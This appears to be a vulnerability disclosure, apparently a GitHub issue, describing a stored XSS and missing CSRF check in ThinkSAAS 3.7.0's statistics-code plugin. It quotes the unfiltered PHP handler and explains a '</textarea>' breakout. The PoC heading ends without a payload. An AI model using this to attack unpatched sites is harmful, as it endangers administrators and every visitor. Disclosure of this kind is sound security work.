There is a storage XSS vulnerability in ThinkSAAS 3.7.0. The vulnerability occurs in the "back-plug-management-statistics code plug-in", where modifying the statistics code does not require CSRF validation, so an attacker can construct a form that allows an administrator to propose the addition of the statistics code. The plugins/edit/pubs/counter.php is not right
code is strictly filtered, so every time an administrator accesses index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set, the page edit_set.html that directly references the variable {$code} triggers a stored XSS vulnerability.
If the statistics code plug-in is turned on, then all users accessing the website will trigger the stored XSS vulnerability on any page.Because, according to the plugins/pubs/counter/counter.php logic, {$code} will be inserted into the all pages.
Details
<?php
defined('IN_TS') or die('Access Denied.');
//插件编辑
switch($ts){
case "set":
$strAbout = fileRead('plugins/pubs/counter/about.php');
$code = fileRead('data/plugins_pubs_counter.php');
if($code==''){
$code = $tsMySqlCache->get('plugins_pubs_counter');
}
$code = stripslashes($code);
include template('edit_set','counter');
break;
case "do":
$code = tsTrim($_POST['code']);
fileWrite('plugins_pubs_counter.php','data',$code);
$tsMySqlCache->set('plugins_pubs_counter',$code);
header('Location: '.SITE_URL.'index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set');
break;
}
As above, the plugins/pubs/counter/edit. PHP in modified statistical code have no code in the tag </textarea> filtering, so that the follow-up in edit_set.html rendering {$code}, The </textarea> closing the <textarea> tag causes the $code that should be inside the textarea tag to be outside the tag.
Hebing123
commented
4 months ago
Summary
There is a storage XSS vulnerability in ThinkSAAS 3.7.0. The vulnerability occurs in the "back-plug-management-statistics code plug-in", where modifying the statistics code does not require CSRF validation, so an attacker can construct a form that allows an administrator to propose the addition of the statistics code. The plugins/edit/pubs/counter.php is not right code is strictly filtered, so every time an administrator accesses index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set, the page edit_set.html that directly references the variable {$code} triggers a stored XSS vulnerability. If the statistics code plug-in is turned on, then all users accessing the website will trigger the stored XSS vulnerability on any page.Because, according to the plugins/pubs/counter/counter.php logic, {$code} will be inserted into the all pages.
Details
As above, the plugins/pubs/counter/edit. PHP in modified statistical code have no code in the tag
</textarea>filtering, so that the follow-up in edit_set.html rendering {$code}, The</textarea>closing the<textarea>tag causes the$codethat should be inside the textarea tag to be outside the tag.Proof of Concept (POC)